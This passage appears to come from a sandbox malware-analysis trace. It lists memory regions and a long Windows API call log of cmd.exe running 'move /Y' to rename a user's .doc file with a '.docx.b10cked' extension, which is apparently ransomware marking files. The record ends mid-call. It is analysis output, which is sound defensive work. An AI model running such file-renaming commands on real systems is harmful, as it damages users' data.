"pagefile_0x0000000000020000" filename = "" Region: id = 14075 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 14076 start_va = 0x360000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 14077 start_va = 0x630000 end_va = 0x63ffff entry_point = 0x0 region_type = private name = 
"private_0x0000000000630000" filename = "" Region: id = 14078 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 14079 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 14080 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 14081 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 14082 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 14083 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 14084 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 14085 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 14086 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x000000007f6f0000" filename = "" Region: id = 14147 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 14148 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 14149 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 14150 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 14151 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 14152 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 14153 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 14154 start_va = 0x460000 end_va = 0x560fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 14155 start_va = 0x640000 end_va = 0x123ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 14156 start_va = 0x1240000 end_va = 0x13a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001240000" filename = "" Thread: id = 195 os_tid = 0xc60 [0136.319] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cfb2c | out: lpSystemTimeAsFileTime=0x2cfb2c*(dwLowDateTime=0x8b2ee500, dwHighDateTime=0x1d440a9)) [0136.319] GetCurrentProcessId () returned 0xc5c [0136.319] GetCurrentThreadId 
() returned 0xc60 [0136.319] GetTickCount () returned 0x2b163 [0136.319] QueryPerformanceCounter (in: lpPerformanceCount=0x2cfb24 | out: lpPerformanceCount=0x2cfb24*=19310864905) returned 1 [0136.320] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0136.320] __set_app_type (_Type=0x1) [0136.320] __p__fmode () returned 0x76b331f4 [0136.320] __p__commode () returned 0x76b331fc [0136.320] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0136.320] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0136.321] GetCurrentThreadId () returned 0xc60 [0136.321] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc60) returned 0x38 [0136.321] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0136.321] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0136.321] SetThreadUILanguage (LangId=0x0) returned 0x409 [0136.324] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0136.324] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cfabc | out: phkResult=0x2cfabc*=0x0) returned 0x2 [0136.325] VirtualQuery (in: lpAddress=0x2cfaf3, lpBuffer=0x2cfa8c, dwLength=0x1c | out: lpBuffer=0x2cfa8c*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0136.325] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cfa8c, dwLength=0x1c | out: lpBuffer=0x2cfa8c*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0136.325] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cfa8c, dwLength=0x1c | out: 
lpBuffer=0x2cfa8c*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0136.325] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cfa8c, dwLength=0x1c | out: lpBuffer=0x2cfa8c*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0136.325] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cfa8c, dwLength=0x1c | out: lpBuffer=0x2cfa8c*(BaseAddress=0x2d0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x90000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0136.325] GetConsoleOutputCP () returned 0x1b5 [0136.327] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0136.327] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0136.327] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.327] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0136.328] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.328] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0136.329] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.330] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0136.331] _get_osfhandle (_FileHandle=0) returned 0x3 [0136.331] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0136.333] _get_osfhandle (_FileHandle=0) returned 0x3 [0136.333] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0136.363] GetEnvironmentStringsW () returned 0x370178* [0136.363] FreeEnvironmentStringsW (penv=0x370178) returned 1 [0136.364] GetEnvironmentStringsW () returned 0x370178* [0136.364] FreeEnvironmentStringsW (penv=0x370178) returned 1 [0136.364] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2cea2c | out: 
phkResult=0x2cea2c*=0x40) returned 0x0 [0136.364] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2cea34, lpData=0x2cea38, lpcbData=0x2cea30*=0x1000 | out: lpType=0x2cea34*=0x0, lpData=0x2cea38*=0xa0, lpcbData=0x2cea30*=0x1000) returned 0x2 [0136.364] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2cea34, lpData=0x2cea38, lpcbData=0x2cea30*=0x1000 | out: lpType=0x2cea34*=0x4, lpData=0x2cea38*=0x1, lpcbData=0x2cea30*=0x4) returned 0x0 [0136.364] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2cea34, lpData=0x2cea38, lpcbData=0x2cea30*=0x1000 | out: lpType=0x2cea34*=0x0, lpData=0x2cea38*=0x1, lpcbData=0x2cea30*=0x1000) returned 0x2 [0136.364] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2cea34, lpData=0x2cea38, lpcbData=0x2cea30*=0x1000 | out: lpType=0x2cea34*=0x4, lpData=0x2cea38*=0x0, lpcbData=0x2cea30*=0x4) returned 0x0 [0136.364] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2cea34, lpData=0x2cea38, lpcbData=0x2cea30*=0x1000 | out: lpType=0x2cea34*=0x4, lpData=0x2cea38*=0x40, lpcbData=0x2cea30*=0x4) returned 0x0 [0136.364] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2cea34, lpData=0x2cea38, lpcbData=0x2cea30*=0x1000 | out: lpType=0x2cea34*=0x4, lpData=0x2cea38*=0x40, lpcbData=0x2cea30*=0x4) returned 0x0 [0136.364] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2cea34, lpData=0x2cea38, lpcbData=0x2cea30*=0x1000 | out: lpType=0x2cea34*=0x0, lpData=0x2cea38*=0x40, lpcbData=0x2cea30*=0x1000) returned 0x2 [0136.364] RegCloseKey (hKey=0x40) returned 0x0 [0136.364] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2cea2c | out: phkResult=0x2cea2c*=0x40) returned 0x0 [0136.364] RegQueryValueExW (in: 
hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2cea34, lpData=0x2cea38, lpcbData=0x2cea30*=0x1000 | out: lpType=0x2cea34*=0x0, lpData=0x2cea38*=0x40, lpcbData=0x2cea30*=0x1000) returned 0x2 [0136.364] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2cea34, lpData=0x2cea38, lpcbData=0x2cea30*=0x1000 | out: lpType=0x2cea34*=0x4, lpData=0x2cea38*=0x1, lpcbData=0x2cea30*=0x4) returned 0x0 [0136.364] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2cea34, lpData=0x2cea38, lpcbData=0x2cea30*=0x1000 | out: lpType=0x2cea34*=0x0, lpData=0x2cea38*=0x1, lpcbData=0x2cea30*=0x1000) returned 0x2 [0136.364] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2cea34, lpData=0x2cea38, lpcbData=0x2cea30*=0x1000 | out: lpType=0x2cea34*=0x4, lpData=0x2cea38*=0x0, lpcbData=0x2cea30*=0x4) returned 0x0 [0136.364] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2cea34, lpData=0x2cea38, lpcbData=0x2cea30*=0x1000 | out: lpType=0x2cea34*=0x4, lpData=0x2cea38*=0x9, lpcbData=0x2cea30*=0x4) returned 0x0 [0136.364] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2cea34, lpData=0x2cea38, lpcbData=0x2cea30*=0x1000 | out: lpType=0x2cea34*=0x4, lpData=0x2cea38*=0x9, lpcbData=0x2cea30*=0x4) returned 0x0 [0136.364] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2cea34, lpData=0x2cea38, lpcbData=0x2cea30*=0x1000 | out: lpType=0x2cea34*=0x0, lpData=0x2cea38*=0x9, lpcbData=0x2cea30*=0x1000) returned 0x2 [0136.364] RegCloseKey (hKey=0x40) returned 0x0 [0136.365] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636a [0136.365] srand (_Seed=0x5b88636a) [0136.365] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\ERN4JQ~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\ERN4JQpRpgZde9N.docx.b10cked\"" 
[0136.365] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\ERN4JQ~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\ERN4JQpRpgZde9N.docx.b10cked\"" [0136.365] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.365] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3718d8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0136.365] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0136.365] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0136.365] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0136.365] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0136.365] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0136.365] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0136.365] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0136.365] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0136.366] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0136.366] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0136.366] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0136.366] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0136.366] GetEnvironmentStringsW () returned 0x3722c8* [0136.366] FreeEnvironmentStringsW (penv=0x3722c8) returned 1 [0136.366] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") 
returned 0x1b [0136.366] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0136.366] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0136.366] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0136.366] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0136.366] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0136.366] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0136.366] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0136.366] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0136.366] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0136.366] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cf7f8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.366] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2cf7f8, lpFilePart=0x2cf7f4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2cf7f4*="Desktop") returned 0x18 [0136.366] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0136.366] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf574 | out: lpFindFileData=0x2cf574) returned 0x370008 [0136.367] FindClose (in: hFindFile=0x370008 | out: hFindFile=0x370008) returned 1 [0136.367] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2cf574 | out: lpFindFileData=0x2cf574) returned 0x370008 [0136.367] FindClose (in: hFindFile=0x370008 | out: hFindFile=0x370008) returned 1 [0136.367] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2cf574 | out: lpFindFileData=0x2cf574) returned 0x370008 [0136.367] FindClose (in: hFindFile=0x370008 | out: hFindFile=0x370008) returned 1 [0136.367] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 
[0136.367] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0136.367] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0136.367] GetEnvironmentStringsW () returned 0x372ae8* [0136.368] FreeEnvironmentStringsW (penv=0x372ae8) returned 1 [0136.368] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.368] GetConsoleOutputCP () returned 0x1b5 [0136.370] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0136.370] GetUserDefaultLCID () returned 0x409 [0136.382] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0136.382] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cf938, cchData=128 | out: lpLCData="0") returned 2 [0136.382] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cf938, cchData=128 | out: lpLCData="0") returned 2 [0136.382] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cf938, cchData=128 | out: lpLCData="1") returned 2 [0136.382] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0136.382] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0136.382] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0136.382] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0136.382] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0136.382] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0136.382] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 
| out: lpLCData="Sat") returned 4 [0136.382] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0136.382] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0136.382] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0136.382] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0136.383] GetConsoleTitleW (in: lpConsoleTitle=0x3608d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.412] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0136.412] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0136.412] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0136.412] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0136.413] _wcsicmp (_String1="move", _String2=")") returned 68 [0136.413] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0136.413] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0136.413] _wcsicmp (_String1="IF", _String2="move") returned -4 [0136.413] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0136.413] _wcsicmp (_String1="REM", _String2="move") returned 5 [0136.413] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0136.415] GetConsoleTitleW (in: lpConsoleTitle=0x2cf630, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.454] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0136.454] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0136.454] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0136.454] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0136.454] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0136.454] _wcsicmp (_String1="move", _String2="CD") returned 10 
[0136.454] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0136.454] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0136.454] _wcsicmp (_String1="move", _String2="REN") returned -5 [0136.454] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0136.454] _wcsicmp (_String1="move", _String2="SET") returned -6 [0136.454] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0136.454] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0136.454] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0136.454] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0136.454] _wcsicmp (_String1="move", _String2="MD") returned 11 [0136.454] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0136.454] _wcsicmp (_String1="move", _String2="RD") returned -5 [0136.454] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0136.454] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0136.454] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0136.454] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0136.454] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0136.454] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0136.454] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0136.454] _wcsicmp (_String1="move", _String2="VER") returned -9 [0136.454] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0136.454] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0136.454] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0136.454] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0136.454] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0136.454] _wcsicmp (_String1="move", _String2="START") returned -6 [0136.454] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0136.454] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0136.454] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0136.456] GetDriveTypeW (lpRootPathName="C:\\") 
returned 0x3 [0136.456] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0136.456] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2cf3ec, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2cf3e4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2cf3e4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0136.456] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0136.456] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0136.456] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0136.456] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0136.456] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0136.456] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0136.456] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0136.456] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0136.456] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0136.456] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0136.456] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0136.456] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0136.456] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0136.456] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0136.456] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0136.456] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.456] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) 
returned -13 [0136.456] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.457] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0136.457] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0136.457] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0136.457] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0136.457] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0136.457] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0136.457] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0136.457] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0136.457] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0136.457] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0136.457] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0136.457] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0136.457] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0136.457] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0136.457] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0136.457] _wcsicmp (_String1="ERN4JQ~1.DOC", _String2=".") returned 55 [0136.457] _wcsicmp (_String1="ERN4JQ~1.DOC", _String2="..") returned 55 [0136.457] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\ERN4JQ~1.DOC" (normalized: "c:\\users\\eebsym5\\docume~1\\ern4jq~1.doc")) returned 0x20 [0136.457] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x371e30 | out: 